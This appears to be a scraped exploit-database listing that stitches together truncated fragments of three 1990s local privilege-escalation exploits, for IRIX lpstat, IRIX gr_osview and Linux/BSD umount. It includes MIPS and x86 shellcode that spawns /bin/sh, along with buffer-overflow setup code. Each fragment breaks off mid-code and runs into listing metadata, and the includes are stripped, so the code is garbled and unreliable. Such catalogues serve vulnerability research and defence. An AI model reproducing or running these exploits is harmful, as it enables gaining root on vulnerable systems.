/*## copyright LAST STAGE OF DELIRIUM nov 1998 poland *://lsd-pl.net/ #*/
/*## /bin/lpstat #*/
#define NOPNUM 468
#define ADRNUM 300
#define PCHNUM 300
char setreuidcode[]=
"\x30\x0b\xff\xff" /* andi $t3,$zero,0xffff */
"\x24\x02\x04\x01" /* li $v0,1024+1 */
"\x20\x42\xff\xff" /* addi $v0,$v0,-1 */
"\x03
Exploit-DB
IRIX 6.5.x - '/usr/sbin/gr_osview' Local Buffer Overflow
exploitdb·1997-01-01
CVE-2000-0797 IRIX 6.5.x - '/usr/sbin/gr_osview' Local Buffer Overflow
IRIX 6.5.x - '/usr/sbin/gr_osview' Local Buffer Overflow
---
/*
source: https://www.securityfocus.com/bid/1526/info
Under certain versions of IRIX, the 'gr_osview' command contains a buffer overflow that local attackers can exploit to gain root privileges.
The gr_osview command produces a graphical display of memory-management activity, including memory usage, page faults, TLB activity, and page swapping. This display provides a realtime window into the overall operation of the system. The buffer overflow itself is in the command-line parsing code and can be overflowed via a long user-supplied string.
*/
/*## copyright LAST STAGE OF DELIRIUM jan 1997 poland *://lsd-pl.net/ #*/
/*## /usr/sbin/gr_osview #*/
#define NOPNUM 3000
#define ADRNUM 3000
#define PCHNUM 1024
#define ALLIGN 1
c
Exploit-DB
BSD / Linux - 'umount' Local Privilege Escalation
exploitdb·1996-08-13
CVE-2000-0218 BSD / Linux - 'umount' Local Privilege Escalation
BSD / Linux - 'umount' Local Privilege Escalation
---
/* Reminder - Be sure to fix the includes /str0ke */
-------------------------------------- linux_umount_exploit.c ----------
#include
#include
#include
#include
#include
#include
#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50
u_long get_esp()
{
__asm__("movl %esp, %eax");
}
main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int i;
int ofs = DEFAULT_OFFSET;
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr
No writeups or analysis indexed.
2000-12-11
Published